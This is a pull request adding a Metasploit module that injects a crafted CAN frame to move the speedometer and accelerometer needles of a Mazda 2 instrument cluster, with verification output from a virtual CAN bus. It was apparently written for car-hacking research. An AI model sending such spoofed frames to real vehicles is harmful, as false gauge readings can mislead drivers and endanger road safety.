### PR TITLE
Add mazda_ic_mover module that moves the instrument cluster

### DIFF
--- a/modules/post/hardware/automotive/mazda_ic_mover.rb
+++ b/modules/post/hardware/automotive/mazda_ic_mover.rb
@@ -7,13 +7,13 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Mazda 2 Instrument Cluster Accelorometer Mover',
-        'Description'   => %q{ This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster},
-        'License'       => MSF_LICENSE,
-        'Author'        => ['Jay Turla'],
-        'Platform'      => ['hardware'],
-        'SessionTypes'  => ['hwbridge']
-      ))
+      'Name'          => 'Mazda 2 Instrument Cluster Accelorometer Mover',
+      'Description'   => %q{ This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster},
+      'License'       => MSF_LICENSE,
+      'Author'        => ['Jay Turla'],
+      'Platform'      => ['hardware'],
+      'SessionTypes'  => ['hwbridge']
+    ))
     register_options([
       OptString.new('CANBUS', [false, "CAN Bus to perform scan on, defaults to connected bus", nil])
     ])

--- a/modules/post/hardware/automotive/mazda_ic_mover.rb
+++ b/modules/post/hardware/automotive/mazda_ic_mover.rb
@@ -25,6 +25,6 @@ class MetasploitModule < Msf::Post
       return
     end
     print_status("Moving the accelorometer and speedometer...")
-    client.automotive.cansend(datastore['CANBUS'], "202", "6010606060606000")
+    client.automotive.cansend(datastore['CANBUS'], "202", "6001606060606000")
   end
 end

--- a/modules/post/hardware/automotive/mazda_ic_mover.rb
+++ b/modules/post/hardware/automotive/mazda_ic_mover.rb
@@ -1,0 +1,30 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Mazda 2 Instrument Cluster Accelorometer Mover',
+        'Description'   => %q{ This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster},
+        'License'       => MSF_LICENSE,
+        'Author'        => ['Jay Turla'],
+        'Platform'      => ['hardware'],
+        'SessionTypes'  => ['hwbridge']
+      ))
+    register_options([
+      OptString.new('CANBUS', [false, "CAN Bus to perform scan on, defaults to connected bus", nil])
+    ])
+  end
+
+  def run
+    unless client.automotive
+      print_error("The hwbridge requires a functional automotive extention")
+      return
+    end
+    print_status("Moving the accelorometer and speedometer...")
+    client.automotive.cansend(datastore['CANBUS'], "202", "6010606060606000")
+  end
+end


### PR DESCRIPTION
This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster which is from the cluster I have been working for ROOTCON's Car Hacking Village: https://twitter.com/rootconph/status/1171333590161879040


## Verification

Fire up the virtual CAN
- [x] sudo modprobe can
- [x] sudo modprobe vcan
- [x] sudo ip link add dev vcan0 type vcan
- [x] sudo ip link set up vcan0

Metasploit console output after connecting with the hwbridge:

```

msf5 auxiliary(client/hwbridge/connect) > run
[*] Running module against 127.0.0.1

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 2 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf5 auxiliary(client/hwbridge/connect) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  2         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf5 auxiliary(client/hwbridge/connect) > sessions -i 2
[*] Starting interaction with 2...

hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0

[*] Moving the accelorometer and speedometer...
hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0

[*] Moving the accelorometer and speedometer...
hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0

[*] Moving the accelorometer and speedometer...
hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0

[*] Moving the accelorometer and speedometer...
hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0

[*] Moving the accelorometer and speedometer...

```

You can use candump to verify the CAN messages being sent:

```
jjt@ubuntu:~/pentot/ICSim$ candump -c vcan0
  vcan0  202   [8]  60 01 60 60 60 60 60 00
  vcan0  202   [8]  60 01 60 60 60 60 60 00
  vcan0  202   [8]  60 01 60 60 60 60 60 00
  vcan0  202   [8]  60 01 60 60 60 60 60 00

```
